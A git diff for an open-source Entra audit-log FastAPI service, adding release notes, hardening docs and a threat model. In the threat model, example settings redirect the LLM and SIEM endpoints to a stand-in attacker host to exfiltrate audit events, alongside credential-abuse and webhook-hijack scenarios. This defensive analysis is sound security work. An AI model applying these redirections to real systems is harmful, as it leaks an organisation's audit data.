@@ -11,13 +11,14 @@ FastAPI microservice that ingests Microsoft Entra (Azure AD) and other admin aud
- Optional OIDC bearer auth (Entra) to protect the API/UI and gate access by roles/groups.
- Natural language query (`/api/ask`) powered by LLM (OpenAI, Azure OpenAI, or any compatible API).
- MCP server for Claude Desktop / Cursor integration.
- Optional Azure Key Vault integration for secrets storage.
## Prerequisites (macOS)
- Python 3.11
- Docker Desktop (for the quickest start) or a local MongoDB instance
- An Entra app registration with **Application** permission `AuditLog.Read.All` and admin consent granted
- Also required to fetch other sources:
- `https://manage.office.com/.default` (Audit API) with `ActivityFeed.Read`/`ActivityFeed.ReadDlp` (built into the app registrations API permissions for Office 365 Management APIs)
- `https://manage.office.com/.default` (Audit API) with `ActivityFeed.Read`/`ActivityFeed.ReadDlp` (built into the app registration's API permissions for Office 365 Management APIs)
- Intune audit: `DeviceManagementConfiguration.Read.All` (or broader) for `/deviceManagement/auditEvents`
- Optional API protection: configure `AUTH_ENABLED=true` and set `AUTH_TENANT_ID`/`AUTH_CLIENT_ID` (the audience) plus allowed roles/groups.
@@ -49,8 +50,43 @@ cp .env.example .env
# LLM_BASE_URL=https://api.openai.com/v1
# LLM_MODEL=gpt-4o-mini
# LLM_TIMEOUT_SECONDS=30
# LLM_ALLOWED_DOMAINS=api.openai.com,*.openai.azure.com
# Optional: SIEM forwarding
# SIEM_ENABLED=true
# SIEM_WEBHOOK_URL=https://your-siem.com/webhook
# SIEM_ALLOWED_DOMAINS=your-siem.com
# Optional: Azure Key Vault for secrets storage
# AZURE_KEY_VAULT_NAME=your-keyvault-name
```
### Using Azure Key Vault for secrets
Instead of storing `CLIENT_SECRET`, `LLM_API_KEY`, `MONGO_URI`, and `WEBHOOK_CLIENT_SECRET` in `.env`, you can store them in Azure Key Vault:
1. Create a Key Vault and add secrets with these names:
- `aoc-client-secret` → your Graph app `CLIENT_SECRET`
- `aoc-llm-api-key` → your `LLM_API_KEY`
- `aoc-mongo-uri` → your `MONGO_URI`
- `aoc-webhook-client-secret` → your `WEBHOOK_CLIENT_SECRET`
2. Uncomment `azure-identity` and `azure-keyvault-secrets` in `backend/requirements.txt`
3. Set `AZURE_KEY_VAULT_NAME=your-keyvault-name` in `.env`
4. Ensure the container has Azure identity credentials (managed identity, service principal, or Azure CLI auth)
## Security Hardening Checklist
Before deploying to production:
- [ ] Set `AUTH_ENABLED=true` and configure `AUTH_ALLOWED_ROLES` or `AUTH_ALLOWED_GROUPS` to restrict access
- [ ] Set explicit `CORS_ORIGINS` (do not use `*` in production with auth enabled)
- [ ] Set `DOCS_ENABLED=false` (default) to hide OpenAPI docs
- [ ] Configure `WEBHOOK_CLIENT_SECRET` to validate Graph webhook notifications
- [ ] Set `LLM_ALLOWED_DOMAINS` if using AI features to prevent data exfiltration
- [ ] Set `SIEM_ALLOWED_DOMAINS` if using SIEM forwarding
- [ ] Review `METRICS_ALLOWED_IPS` — defaults to private networks only
- [ ] Consider Azure Key Vault instead of `.env` for secrets
- [ ] Review the threat model: `THREAT_MODEL_v1.7.13.md`
## Run with Docker Compose (recommended)
```bash
docker compose up --build
@@ -76,7 +112,7 @@ uvicorn main:app --reload --host 0.0.0.0 --port 8000
## API
- `GET /health` — health check with MongoDB connectivity status.
- `GET /metrics` — Prometheus metrics for request latency, fetch volume, and errors.
- `GET /metrics` — Prometheus metrics for request latency, fetch volume, and errors (IP-restricted).
- `GET /api/version` — running version (baked into the Docker image at build time).
- `GET /api/fetch-audit-logs` — pulls the last 7 days by default (override with `?hours=N`, capped to 30 days) of:
- Entra directory audit logs (`/auditLogs/directoryAudits`)
@@ -171,7 +207,7 @@ curl http://localhost:8000/api/fetch-audit-logs
- Visit the UI at http://localhost:8000 to filter by user/service/action/result/time, search raw text, paginate, and view raw events.
## Maintenance (Dockerized)
Use the backend image so you dont need a local venv:
Use the backend image so you don't need a local venv:
```bash
# ensure Mongo + backend network are up
docker compose up -d mongo
@@ -182,10 +218,15 @@ docker compose run --rm backend python maintenance.py dedupe
```
Omit `--limit` to process all events. You can also run commands inside a running backend container with `docker compose exec backend ...`.
## Security Documentation
- `PEN_TEST_REPORT_v1.7.11.md` — Penetration test findings and remediation
- `THREAT_MODEL_v1.7.13.md` — Comprehensive threat model covering Entra application abuse, token handling, data exfiltration vectors
## Notes / Troubleshooting
- Ensure `TENANT_ID`, `CLIENT_ID`, and `CLIENT_SECRET` match an app registration with `AuditLog.Read.All` (application) permission and admin consent.
- Additional permissions: Office 365 Management Activity (`ActivityFeed.Read`), and Intune audit (`DeviceManagementConfiguration.Read.All`).
- Auth: if `AUTH_ENABLED=true`, issued tokens must be from `AUTH_TENANT_ID`, audience = `AUTH_CLIENT_ID`; access is granted if roles or groups overlap `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` (if set).
- Auth: if `AUTH_ENABLED=true`, issued tokens must be from `AUTH_TENANT_ID`, audience = `AUTH_CLIENT_ID`; access is granted if roles or groups overlap `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` (if set). A startup warning is logged if auth is enabled but no roles/groups are configured.
- Backfill limits: Management Activity API typically exposes ~7 days of history via API (longer if your tenant has extended/Advanced Audit retention). Directory/Intune audit retention follows your tenant policy (commonly 3090 days, longer with Advanced Audit).
- If you change Mongo credentials/ports, update `MONGO_URI` in `.env` (Docker Compose passes it through to the backend).
- The service uses the `micro_soc` database and `events` collection by default; adjust in `backend/config.py` if needed.
- If using Azure Key Vault, ensure the runtime identity (managed identity, service principal, or local Azure CLI) has `Get` permission on secrets.

43
RELEASE_NOTES_v1.7.12.md Normal file
View File

@@ -0,0 +1,43 @@
# AOC v1.7.12 Release Notes
**Release Date:** 2026-04-27
## Security Hardening (Penetration Test Remediation)
This release addresses all findings from the internal soft penetration test of v1.7.11.
### Critical Fix: CORS Credentials Leak
- **Issue:** When `AUTH_ENABLED=true` and `CORS_ORIGINS="*"`, the CORS middleware reflected any origin with `Access-Control-Allow-Credentials: true`, allowing cross-origin authenticated requests from attacker-controlled domains.
- **Fix:** When auth is enabled with a wildcard origin, `allow_credentials` is now forced to `False`. CORS still works for unauthenticated requests, but bearer tokens cannot be leaked cross-origin.
### High Fix: Missing Security Headers
- Added `X-Content-Type-Options: nosniff`
- Added `X-Frame-Options: DENY`
- Added `Referrer-Policy: strict-origin-when-cross-origin`
- Added `Permissions-Policy` restricting browser features (accelerometer, camera, geolocation, gyroscope, magnetometer, microphone, payment, USB)
### Medium Fixes
- **Rate limiter fail-closed:** Previously, a Redis outage silently disabled all rate limiting. The rate limiter now returns `429` when Redis is unreachable.
- **OpenAPI docs exposure:** `/docs`, `/redoc`, and `/openapi.json` are disabled by default. Set `DOCS_ENABLED=true` to re-enable (intended for development only).
### Low Fixes
- **Information disclosure:** `/api/config/auth` no longer leaks `tenant_id` and `client_id` when `auth_enabled=false`.
- **Webhook validation token:** Added length cap (1024 chars) and ASCII-only validation before echoing `validationToken`. Response now includes `X-Content-Type-Options: nosniff`.
## Files Changed
| File | Change |
|------|--------|
| `backend/main.py` | CORS fix, security headers middleware, conditional OpenAPI docs |
| `backend/config.py` | Added `DOCS_ENABLED` setting |
| `backend/rate_limiter.py` | Fail-closed on Redis errors |
| `backend/routes/config.py` | Hide tenant/client IDs when auth disabled |
| `backend/routes/webhooks.py` | Validate validationToken before echo |
| `backend/tests/conftest.py` | Enhanced FakeRedis mock with `incr`/`expire` |
| `.env.example` | Documented `DOCS_ENABLED` |
| `VERSION` | Bumped to 1.7.12 |
## Test Results
- **80/80 pytest tests passing**
- Penetration test report: `PEN_TEST_REPORT_v1.7.11.md`

34
RELEASE_NOTES_v1.7.13.md Normal file
View File

@@ -0,0 +1,34 @@
# AOC v1.7.13 Release Notes
**Release Date:** 2026-04-27
## Security Hardening: Alpine.js CSP Build
This release removes `unsafe-eval` from the Content-Security-Policy by switching the frontend to Alpine.js's CSP-compatible build.
### Changes
- **Frontend:** Switched from `alpinejs@3.x.x/dist/cdn.min.js` to `alpinejs@3.x.x/dist/csp.min.js`
- **Frontend:** Added explicit `Alpine.start()` call on `DOMContentLoaded` (required by CSP build)
- **Backend CSP:** Removed `'unsafe-eval'` from `script-src` directive
### Why this matters
The previous v1.7.111.7.12 releases included `'unsafe-eval'` in the CSP because the standard Alpine.js CDN build uses `new Function()` internally for reactive expression evaluation. The CSP build eliminates this requirement, further hardening the application against XSS and injection attacks.
### Compatibility
All existing Alpine.js directives (`x-data`, `x-init`, `x-show`, `x-text`, `x-for`, `x-if`, `x-model`, event handlers) continue to work unchanged. The CSP build uses a safe expression evaluator that produces identical behavior without `eval`/`new Function`.
## Files Changed
| File | Change |
|------|--------|
| `backend/frontend/index.html` | Alpine.js src → `csp.min.js`; added `Alpine.start()` |
| `backend/main.py` | Removed `'unsafe-eval'` from `script-src` CSP |
| `VERSION` | Bumped to 1.7.13 |
## Test Results
- **80/80 pytest tests passing**
- Ruff lint/format clean

64
RELEASE_NOTES_v1.7.14.md Normal file
View File

@@ -0,0 +1,64 @@
# AOC v1.7.14 Release Notes
**Release Date:** 2026-04-27
## Security Hardening: Threat Model Remediation
This release addresses the high-severity findings from the v1.7.13 threat model review.
### LLM Endpoint Domain Allowlist
- **New config:** `LLM_ALLOWED_DOMAINS` (comma-separated, supports wildcards like `*.openai.azure.com`)
- **Behavior:** When configured, the `/api/ask` endpoint rejects `LLM_BASE_URL` domains not in the allowlist
- **Impact:** Prevents audit data exfiltration via a compromised or attacker-controlled LLM endpoint
### SIEM Webhook SSRF Guard
- **New config:** `SIEM_ALLOWED_DOMAINS` (comma-separated)
- **Behavior:** The SIEM forwarder now validates `SIEM_WEBHOOK_URL` with the same SSRF checks as the LLM endpoint (HTTPS-only, blocks private IPs, enforces domain allowlist)
- **Impact:** Prevents real-time audit data exfiltration via a malicious SIEM webhook URL
### CDN Subresource Integrity (SRI)
- Added `integrity` hashes to both CDN scripts in the frontend:
- Alpine.js 3.15.11: `sha384-WPtu0YHhJ3arcykfnv1JgUffWDSKRnqnDeTpJUbOc2os2moEmLkIdaeR0trPN4be`
- MSAL.js 2.37.0: `sha384-DUSOaqAzlZRiZxkDi8hL7hXJDZ+X39ZOAYV9ZDx44gUv9pozmcunJH02tjSFLPnW`
- **Impact:** Browser refuses to execute CDN scripts if the content doesn't match the hash, preventing supply chain compromise
### Auth Misconfiguration Warning
- At startup, AOC now logs a `WARNING` if `AUTH_ENABLED=true` but neither `AUTH_ALLOWED_ROLES` nor `AUTH_ALLOWED_GROUPS` is configured
- **Impact:** Operators are alerted when the app is accidentally left open to all Entra users
### Azure Key Vault Integration (Optional)
- **New module:** `backend/secrets_manager.py`
- **New config:** `AZURE_KEY_VAULT_NAME`
- **Behavior:** If `AZURE_KEY_VAULT_NAME` is set, AOC fetches these secrets from Key Vault at startup:
- `aoc-client-secret``CLIENT_SECRET`
- `aoc-llm-api-key``LLM_API_KEY`
- `aoc-mongo-uri``MONGO_URI`
- `aoc-webhook-client-secret``WEBHOOK_CLIENT_SECRET`
- Falls back silently to `.env` / environment variables when Key Vault is not configured
- **Dependencies:** `azure-identity` and `azure-keyvault-secrets` (commented out in `requirements.txt` — uncomment when using Key Vault)
- **Impact:** Eliminates long-lived secrets from `.env` files and Docker images
## Files Changed
| File | Change |
|------|--------|
| `backend/config.py` | Added `LLM_ALLOWED_DOMAINS`, `SIEM_ALLOWED_DOMAINS`, `AZURE_KEY_VAULT_NAME` |
| `backend/routes/ask.py` | Domain allowlist enforcement for LLM URL |
| `backend/siem.py` | SSRF guard + domain allowlist for SIEM webhook |
| `backend/frontend/index.html` | SRI hashes for Alpine.js and MSAL.js |
| `backend/main.py` | Startup warning for auth misconfiguration |
| `backend/secrets_manager.py` | New — Azure Key Vault integration |
| `backend/requirements.txt` | Added optional Azure Key Vault packages |
| `.env.example` | Documented new settings |
| `VERSION` | Bumped to 1.7.14 |
| `THREAT_MODEL_v1.7.13.md` | Threat model documentation |
## Test Results
- **80/80 pytest tests passing**
- Ruff lint/format clean

99
RELEASE_NOTES_v1.7.7.md Normal file
View File

@@ -0,0 +1,99 @@
# AOC v1.7.7 Release Notes
**Release date:** 2026-04-24
---
## Security Hardening
This release is a focused security patch addressing findings from an internal audit. All users running AOC in production are encouraged to upgrade.
### Webhook authentication (`/api/webhooks/graph`)
- **ClientState validation** — Notifications now require a matching `WEBHOOK_CLIENT_SECRET`. Set this in your `.env` to the same value used when creating Graph subscriptions.
- Rejects spoofed notification payloads with `401 Unauthorized`.
### Rate limiting
- **Redis-backed fixed-window rate limiting** is now enabled by default.
- Per-category limits:
- `/api/fetch-audit-logs` — 10 requests/hour
- `/api/ask` — 30 requests/minute
- `/api/events/bulk-tags` — 20 requests/minute
- All other endpoints — 120 requests/minute
- Returns `429 Too Many Requests` with a `Retry-After` header when exceeded.
### SSRF protection for LLM calls
- `LLM_BASE_URL` is now validated before every outbound request.
- Blocks non-HTTPS URLs, localhost, link-local addresses (`169.254.169.254`), and all private IP ranges.
### CORS enforcement
- Wildcard (`*`) origins are **automatically stripped** when `AUTH_ENABLED=true`.
- A startup warning is logged if an insecure CORS configuration is detected.
### Content Security Policy
- API and HTML responses now include a `Content-Security-Policy` header.
- Restricts script sources to self, CDN origins, and MSAL auth library.
### Audit trail integrity
- The audit middleware no longer parses JWT tokens without signature verification.
- Verified claims are now propagated safely via `contextvars`, eliminating audit log poisoning.
### Standalone MCP server
- Prints a prominent security warning on startup reminding operators that the stdio transport has no authentication layer.
---
## Operational Improvements
### Bulk tag cap
- `POST /api/events/bulk-tags` now refuses to update more than **10,000 events** in a single request.
- Returns `400` with guidance to narrow filters.
### Generic error responses
- Internal exception details are no longer leaked in HTTP 500/502 responses.
- Full stack traces remain in server-side logs.
### Alert rule schema
- `conditions` field now uses a strict Pydantic model (`AlertCondition`) instead of an unconstrained `list[dict]`.
- Prevents stored data pollution from malformed rule payloads.
### Docker Compose
- MongoDB (`27017`) and Redis (`6379`) ports are no longer forwarded to the Docker host.
- Internal services are reachable only via the Docker network.
---
## Configuration
Add to your `.env`:
```bash
# Required if you use Graph webhooks
WEBHOOK_CLIENT_SECRET=your-random-secret
# Optional: disable rate limiting (not recommended)
RATE_LIMIT_ENABLED=true
RATE_LIMIT_REQUESTS=120
RATE_LIMIT_WINDOW_SECONDS=60
```
---
## Upgrade notes
**No breaking changes.** Existing event data, tags, comments, and saved searches are preserved.
After pulling:
```bash
export AOC_VERSION=v1.7.7
docker compose -f docker-compose.prod.yml pull
docker compose -f docker-compose.prod.yml up -d
```
---
## Docker image
```
git.cqre.net/cqrenet/aoc-backend:v1.7.7
```

View File

@@ -59,7 +59,7 @@ Goal: evolve from a polling dashboard into a full security operations tool.
---
## Phase 5: Intelligence
## Phase 5: Intelligence
Goal: add AI-powered analysis and external tool integration.
- [x] AI feature flag (`AI_FEATURES_ENABLED`) to gate LLM-dependent features
@@ -72,3 +72,51 @@ Goal: add AI-powered analysis and external tool integration.
## Completed in this PR
All Phase 5 items marked done were implemented in v1.3.0v1.5.0.
Redis caching + async queue implemented in v1.6.0, switched to Valkey.
UI polish (topbar, footer, clickable pills) in v1.6.1v1.6.4.
---
## Phase 6: Security Hardening ✅
Goal: address penetration test findings and threat model gaps.
- [x] Fix CORS credentials leak (v1.7.12)
- [x] Add security headers (X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy) (v1.7.12)
- [x] Make rate limiter fail-closed on Redis failure (v1.7.12)
- [x] Disable OpenAPI docs by default (v1.7.12)
- [x] Hide tenant_id/client_id from config endpoint when auth disabled (v1.7.12)
- [x] Validate webhook validationToken before echo (v1.7.12)
- [x] Gate `/metrics` behind IP allowlist (v1.7.12)
- [x] Add LLM domain allowlist (`LLM_ALLOWED_DOMAINS`) (v1.7.14)
- [x] Add SIEM webhook SSRF guard + domain allowlist (v1.7.14)
- [x] Add SRI hashes to CDN scripts (v1.7.14)
- [x] Add startup warning for auth misconfiguration (v1.7.14)
- [x] Add Azure Key Vault integration for secrets storage (v1.7.14)
- [x] Internal penetration test + threat model documentation
---
## Phase 7: Multi-Tenancy (Premium) ⏸️
Goal: allow MSPs to manage multiple client tenants from a single deployment.
Status: **Planned — not started**. Architecture designed, pending validation of core features (SIEM export, alerting) in production first.
### Architecture
- Row-level isolation: `tenant_id` field on every MongoDB document
- Each tenant has their own Microsoft Entra tenant + app registration credentials
- Auth: user's JWT `tid` claim maps to tenant config automatically
- Super-admin role for MSP staff to access all tenants
### Implementation phases
- **Phase 7.1** (23 days): Tenant model & registry, tenant-aware data layer, per-tenant Graph API auth
- **Phase 7.2** (1 day): Tenant-scoped API routes, tenant-specific config endpoints
- **Phase 7.3** (2 days): Frontend tenant switcher, tenant name display, admin page
- **Phase 7.4** (1 day): License gating — signed JWT `LICENSE_KEY` gates multi-tenant mode
### Licensing model
- Single-tenant: remains MIT/free
- Multi-tenant: premium feature requiring a signed license key
- License key is a JWT with claims: `plan`, `max_tenants`, `exp`, `features`
- Offline license generation tool included
### Effort estimate
~79 days total. Deferred until SIEM export and alerting are battle-tested.

321
THREAT_MODEL_v1.7.13.md Normal file
View File

@@ -0,0 +1,321 @@
# AOC Threat Model — v1.7.13
**Date:** 2026-04-27
**Scope:** Entra ID / Microsoft Graph integration, token handling, data flows, external dependencies
**Assumptions:** Deployment is Docker Compose behind nginx reverse proxy; `AUTH_ENABLED=true`; `AI_FEATURES_ENABLED` may be true or false.
---
## Attack Surface Map
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ ATTACKER │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────────┐ ┌──────────────┐ ┌─────────────────┐ │
│ │ Frontend │ │ API │ │ Webhook │ │
│ │ (CDN JS) │ │ (/api/*) │ │ (/api/webhooks)│ │
│ └──────┬──────┘ └──────┬───────┘ └────────┬────────┘ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────────────────────────────────────────────────────────┐ │
│ │ AOC BACKEND │ │
│ │ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │ │
│ │ │ Auth │ │ Events │ │ Fetch │ │ Ask/LLM │ │ │
│ │ │ (JWT) │ │ (Mongo) │ │ (Graph) │ │ (HTTP) │ │ │
│ │ └────┬─────┘ └────┬─────┘ └────┬─────┘ └────┬─────┘ │ │
│ │ │ │ │ │ │ │
│ │ ▼ ▼ ▼ ▼ │ │
│ │ ┌─────────────────────────────────────────────────────┐ │ │
│ │ │ SECRETS / CREDENTIALS │ │ │
│ │ │ CLIENT_SECRET │ LLM_API_KEY │ MONGO_PASSWORD │ │ │
│ │ └─────────────────────────────────────────────────────┘ │ │
│ └─────────────────────────────────────────────────────────────┘ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────────┐ ┌──────────────┐ ┌─────────────────┐ │
│ │ Microsoft │ │ LLM API │ │ SIEM Webhook │ │
│ │ Graph API │ │ (OpenAI/ │ │ (optional) │ │
│ │ │ │ Azure) │ │ │ │
│ └─────────────┘ └──────────────┘ └─────────────────┘ │
└─────────────────────────────────────────────────────────────────────────────┘
```
---
## 1. Entra App Registration Abuse — HIGH
### 1.1 Client Credentials Leak = Full Tenant Read
**How it works:**
- AOC uses `client_credentials` flow (`graph/auth.py`)
- `CLIENT_ID` + `CLIENT_SECRET` are exchanged for an access token at `login.microsoftonline.com`
- The token has `https://graph.microsoft.com/.default` scope
- This grants **all application permissions** configured in the Entra app registration
**Typical permissions:**
- `Directory.Read.All` — read all users, groups, devices, roles
- `AuditLog.Read.All` — read all audit logs
- `DeviceManagementManagedDevices.Read.All` — read all Intune devices
**Attack scenario:**
1. Attacker gains read access to `.env` or the Docker container filesystem
2. Attacker calls the token endpoint directly with the leaked `CLIENT_ID`/`CLIENT_SECRET`
3. Attacker receives a Graph API access token valid for ~1 hour
4. Attacker can query ALL tenant data independently of AOC
**Impact:** Complete tenant data exfiltration — users, groups, devices, audit logs, mailboxes (if `Exchange.Read` granted).
**Mitigation in place:** None. The backend needs these permissions to function.
**Recommendation:**
- Store `CLIENT_SECRET` in a secret manager (Azure Key Vault, HashiCorp Vault) rather than `.env`
- Use short-lived certificates instead of long-lived secrets for app authentication
- Monitor Entra sign-in logs for anomalous `client_credentials` token requests
- Restrict app registration permissions to the absolute minimum (e.g., `AuditLog.Read.All` + `Directory.Read.All` only)
---
### 1.2 No Scope Restriction on Graph Token
**Finding:** `get_access_token()` always requests `https://graph.microsoft.com/.default` — the full permission set. There's no mechanism to request narrower scopes for specific operations.
**Impact:** If the app registration has 10 permissions, every token has all 10. A bug in one code path could expose data from all 10 permission areas.
**Recommendation:** Not easily fixable without splitting into multiple app registrations. Document as accepted risk.
---
## 2. Authentication & Token Validation — MEDIUM
### 2.1 JWKS Fetch Without TLS Certificate Validation Hardening
**Finding:** `_get_jwks()` fetches OIDC configuration and JWKS from `login.microsoftonline.com` using standard `requests` TLS validation. No certificate pinning or CA bundle restriction.
**Attack scenario (advanced):**
1. Attacker compromises DNS or a network hop between AOC and Microsoft
2. Attacker serves a fake JWKS endpoint with their own public key
3. Attacker issues a forged JWT signed with their private key
4. AOC validates the forged JWT against the attacker's public key
5. Attacker gains authenticated access
**Likelihood:** Very low (requires DNS compromise or nation-state-level interception).
**Mitigation:** Standard TLS validation is in place. For high-security environments, consider pinning the `login.microsoftonline.com` certificate thumbprint.
---
### 2.2 Missing `nbf` / `iat` Claim Verification
**Finding:** `_decode_token()` verifies `exp`, `tid`, `iss`, and `aud` but does not check `nbf` (not before) or `iat` (issued at) claims.
**Impact:** A token used before its validity period (`nbf`) or with a suspicious future `iat` would be accepted. Minor issue — MSAL tokens are well-formed in practice.
---
### 2.3 Role/Group Gating Defaults to "Allow All"
**Finding:** In `auth.py`:
```python
def _allowed(claims, allowed_roles, allowed_groups):
if not allowed_roles and not allowed_groups:
return True
```
**Impact:** If `AUTH_ENABLED=true` but `AUTH_ALLOWED_ROLES` and `AUTH_ALLOWED_GROUPS` are left empty (the default), **every Entra user in the tenant** can authenticate and use AOC. This is a common misconfiguration.
**Recommendation:** Add a startup warning when auth is enabled but no roles/groups are configured. Consider changing the default to deny-all.
---
### 2.4 Privacy Service Role Gating Also Defaults to "Allow All"
**Finding:** `user_can_access_privacy_services()` returns `True` if `PRIVACY_SERVICE_ROLES` is empty. If an admin configures `PRIVACY_SERVICES` (e.g., `Exchange`) but forgets to set `PRIVACY_SERVICE_ROLES`, all users see all privacy data.
---
## 3. Data Exfiltration Paths — HIGH
### 3.1 LLM Endpoint as Data Exfiltration Channel
**Finding:** When `AI_FEATURES_ENABLED=true` and `LLM_API_KEY` is set:
- The `/api/ask` endpoint sends audit event data (actors, targets, operations, summaries) to the configured LLM API
- `_validate_llm_url()` blocks private IPs but does NOT restrict the domain to an allowlist
- Any HTTPS URL is accepted
**Attack scenario:**
1. Attacker gains `.env` write access (or container filesystem access)
2. Attacker changes `LLM_BASE_URL` to `https://attacker.com/fake-llm`
3. Attacker sends an `/api/ask` request like "show me all events"
4. AOC queries MongoDB and sends up to `LLM_MAX_EVENTS` (default 200) events to the attacker's URL
5. Attacker receives structured audit data including actor names, UPNs, device names, operation details
**Impact:** Up to 200 audit events exfiltrated per API call. With pagination, an attacker could exfiltrate the entire database.
**Mitigation in place:** SSRF guard blocks private IPs and localhost.
**Gap:** No domain allowlist. An attacker-controlled public HTTPS endpoint is accepted.
**Recommendation:**
- Add `LLM_ALLOWED_DOMAINS` config (e.g., `api.openai.com,*.openai.azure.com`)
- Validate `LLM_BASE_URL` against this allowlist at startup and on every request
- Log all LLM requests with event counts sent
---
### 3.2 SIEM Webhook as Real-Time Exfiltration Channel
**Finding:** `siem.py` forwards every normalized event to `SIEM_WEBHOOK_URL` during ingestion:
```python
def forward_event(event):
if not SIEM_ENABLED or not SIEM_WEBHOOK_URL:
return
requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10)
```
**Gap:** No URL validation at all. Unlike the LLM endpoint, the SIEM webhook has NO SSRF guard.
**Attack scenario:**
1. Attacker sets `SIEM_ENABLED=true` and `SIEM_WEBHOOK_URL=https://attacker.com/collect`
2. Every new audit event fetched from Graph is immediately POSTed to the attacker's URL
3. Attacker receives real-time stream of all tenant audit events
**Impact:** Real-time, continuous data exfiltration of all audit events.
**Recommendation:**
- Add the same SSRF validation to `SIEM_WEBHOOK_URL` that exists for `LLM_BASE_URL`
- Add `SIEM_ALLOWED_DOMAINS` config
- Log SIEM forwarding failures prominently
---
### 3.3 Export Features (JSON/CSV)
**Finding:** The frontend has `exportJSON()` and `exportCSV()` functions that download all currently filtered events. These are authenticated but not rate-limited separately from `/api/events`.
**Impact:** A compromised account can export large batches of events. However, this requires authentication and is bounded by the 500-event page size limit.
**Risk level:** LOW — requires valid auth and is noisy.
---
## 4. Webhook Abuse — MEDIUM
### 4.1 Graph Change Notification Webhook
**Finding:** `/api/webhooks/graph` receives Microsoft Graph change notifications:
- Echoes `validationToken` for subscription handshake
- Accepts notifications with optional `clientState` validation
- `WEBHOOK_CLIENT_SECRET` is empty by default
**Attack scenario 1 — Subscription hijacking:**
1. Attacker discovers the webhook URL (via API enumeration or guess)
2. Attacker creates a Graph subscription pointing to the AOC webhook URL
3. Attacker receives change notifications for the subscribed resource
**Mitigation:** Notifications without matching `clientState` are rejected when `WEBHOOK_CLIENT_SECRET` is configured. But it's empty by default.
**Attack scenario 2 — Validation token abuse:**
1. Attacker sends a POST to `/api/webhooks/graph?validationToken=<arbitrary content>`
2. AOC echoes the token back as `text/plain`
3. Could be used for cache poisoning or response splitting
**Mitigation:** Length and ASCII validation added in v1.7.12.
**Recommendation:**
- Require `WEBHOOK_CLIENT_SECRET` to be set in production
- Document that the webhook endpoint should NOT be exposed to the public internet
---
## 5. Supply Chain — MEDIUM
### 5.1 CDN Scripts Without Subresource Integrity (SRI)
**Finding:** The frontend loads two external scripts without SRI hashes:
```html
<script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script>
<script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" crossorigin="anonymous"></script>
```
**Attack scenario:**
1. `cdn.jsdelivr.net` or `alcdn.msauth.net` is compromised (supply chain attack)
2. Malicious JavaScript is served instead of the legitimate library
3. Malicious script can steal MSAL tokens, modify API requests, or exfiltrate data
**Impact:** Complete frontend compromise — token theft, data exfiltration, UI spoofing.
**Recommendation:**
- Add SRI hashes to both script tags:
```html
<script defer src="..." integrity="sha384-..." crossorigin="anonymous"></script>
```
- Or vendor the JS files and serve them from the same origin
---
## 6. Privilege Escalation — MEDIUM
### 6.1 Application Permissions Bypass User Boundaries
**Finding:** Because AOC uses application permissions (not delegated permissions), the backend can read audit logs for ALL users, not just the authenticated user. The privacy service filtering (`PRIVACY_SERVICES`) is the only boundary — and it's opt-in.
**Impact:** A user with minimal Entra permissions (e.g., a regular user who can authenticate) can view audit logs for the entire tenant if:
- `PRIVACY_SERVICES` is not configured, OR
- `PRIVACY_SERVICE_ROLES` is not configured
**Recommendation:**
- Document that AOC should be restricted to admin/security roles via `AUTH_ALLOWED_ROLES`
- Consider adding per-user event filtering (only show events where the authenticated user is the actor or target)
---
## 7. Miscellaneous Vectors — LOW
### 7.1 Token Cache in Memory
**Finding:** `_TOKEN_CACHE` in `graph/auth.py` is an in-memory dictionary. If an attacker gains code execution in the Python process, they can read the cache or call `get_access_token()` directly.
**Impact:** Attacker with code execution can get Graph API tokens. But if they have code execution, they already have `CLIENT_SECRET` from memory or `.env`.
### 7.2 MongoDB Connection String
**Finding:** `MONGO_URI` contains credentials. If an attacker gains filesystem access, they can connect directly to MongoDB and bypass all AOC auth/privacy controls.
**Mitigation:** MongoDB is internal to Docker network (not exposed to host in production compose file).
### 7.3 Audit Trail Log Injection
**Finding:** `audit_trail.log_action()` stores actions in MongoDB. The `details` dict could contain user-controlled data (e.g., filter values). If the audit log is ever rendered without escaping, this could lead to XSS.
**Risk level:** LOW — audit logs are not currently rendered in the UI.
---
## Risk Summary
| Vector | Severity | Likelihood | Requires |
|--------|----------|------------|----------|
| Client secret leak → full tenant read | **HIGH** | Medium | `.env` or container access |
| LLM endpoint hijacking → data exfil | **HIGH** | Low | `.env` write access |
| SIEM webhook hijacking → real-time exfil | **HIGH** | Low | `.env` write access |
| CDN compromise → frontend token theft | **MEDIUM** | Low | Supply chain attack |
| Role gating misconfig → all users access | **MEDIUM** | High | Misconfiguration |
| Webhook subscription hijacking | **MEDIUM** | Low | URL discovery |
| DNS compromise → fake JWKS | **MEDIUM** | Very low | Network compromise |
| Application permissions bypass boundaries | **MEDIUM** | High | Default config |
| Token replay | LOW | Low | Token theft |
| Audit log injection | LOW | Low | Filter manipulation |
---
## Immediate Recommendations
1. **Add LLM domain allowlist** (`LLM_ALLOWED_DOMAINS`) and validate at startup
2. **Add SIEM SSRF guard** — reuse `_validate_llm_url()` for `SIEM_WEBHOOK_URL`
3. **Add SRI hashes** to CDN script tags, or vendor the libraries
4. **Add startup warning** when auth is enabled but no `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` configured
5. **Document webhook security** — require `WEBHOOK_CLIENT_SECRET` in production
6. **Consider Key Vault integration** for `CLIENT_SECRET` and `LLM_API_KEY`
7. **Add per-user filtering option** — restrict events to those involving the authenticated user

View File

@@ -1 +1 @@
1.6.0
1.7.14

View File

@@ -1,3 +1,4 @@
import contextvars
import time
import requests
@@ -15,6 +16,9 @@ from fastapi import Header, HTTPException
from jwt import ExpiredSignatureError, InvalidTokenError, decode
from jwt.algorithms import RSAAlgorithm
# Thread-/task-local storage for verified auth claims (used by audit middleware)
_auth_context: contextvars.ContextVar[dict | None] = contextvars.ContextVar("auth_context", default=None)
JWKS_CACHE = {"exp": 0, "keys": []}
